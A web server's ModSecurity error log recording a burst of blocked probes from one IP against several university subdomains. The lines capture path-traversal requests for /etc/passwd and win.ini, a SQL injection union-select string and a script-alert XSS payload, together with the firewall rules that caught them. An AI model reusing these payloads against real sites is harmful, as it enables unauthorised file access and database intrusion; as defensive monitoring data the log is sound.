[Tue Aug 29 11:48:53.364057 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAktzHEAAAAP"]
[Tue Aug 29 11:48:53.369100 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAk1w8YAAAAY"]
[Tue Aug 29 11:48:53.369711 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAlOZJ0AAAAu"]
[Tue Aug 29 11:48:53.372307 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAjtdCQAAAAX"]
[Tue Aug 29 11:48:53.376454 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAk2KZMAAAAb"]
[Tue Aug 29 11:48:53.387182 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAksktsAAAAN"]
[Tue Aug 29 11:48:54.375979 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tsCo-f0AAAlQ3sUAAAAw"]
[Tue Aug 29 11:48:54.376332 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tsCo-f0AAAl8pQcAAAAm"]
[Tue Aug 29 11:48:54.389526 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAkle1QAAAAD"]
[Tue Aug 29 11:48:54.414447 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAmIbKQAAAAo"]
[Tue Aug 29 11:48:54.441687 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAlkwiUAAAAO"]
[Tue Aug 29 11:48:54.443924 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAl4sTwAAAAf"]
[Tue Aug 29 11:48:54.446227 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAjtdCcAAAAX"]
[Tue Aug 29 11:48:55.361821 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAlo0z4AAAAJ"]
[Tue Aug 29 11:48:55.363832 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkskt0AAAAN"]
[Tue Aug 29 11:48:55.376619 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkoTl8AAAAH"]
[Tue Aug 29 11:48:55.379671 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14t8Co-f0AAAlFH7cAAAAk"]
[Tue Aug 29 11:48:55.414478 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAkGCZUAAAAE"]
[Tue Aug 29 11:48:55.435550 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAl74t0AAAAj"]
[Tue Aug 29 11:48:55.439756 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkqHuIAAAAM"]
[Tue Aug 29 11:48:55.473745 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAk7QLgAAAAi"]
[Tue Aug 29 11:48:55.563038 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAlV8CkAAAA1"]
[Tue Aug 29 11:48:56.355556 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAl8pQgAAAAm"]
[Tue Aug 29 11:48:56.387306 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14uMCo-f0AAAkle1YAAAAD"]
[Tue Aug 29 11:48:56.387321 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAluT2IAAAAe"]
[Tue Aug 29 11:48:56.392390 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkoTmEAAAAH"]
[Tue Aug 29 11:48:56.393132 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAkwQT0AAAAS"]
[Tue Aug 29 11:48:56.407154 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkGCZYAAAAE"]
[Tue Aug 29 11:48:56.408215 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAk5CgEAAAAg"]
[Tue Aug 29 11:48:56.415228 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkqHuQAAAAM"]
[Tue Aug 29 11:48:57.419482 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAk5CgIAAAAg"]
[Tue Aug 29 11:48:57.424721 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAlNqtkAAAAt"]
[Tue Aug 29 11:48:57.436253 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAl4sT4AAAAf"]
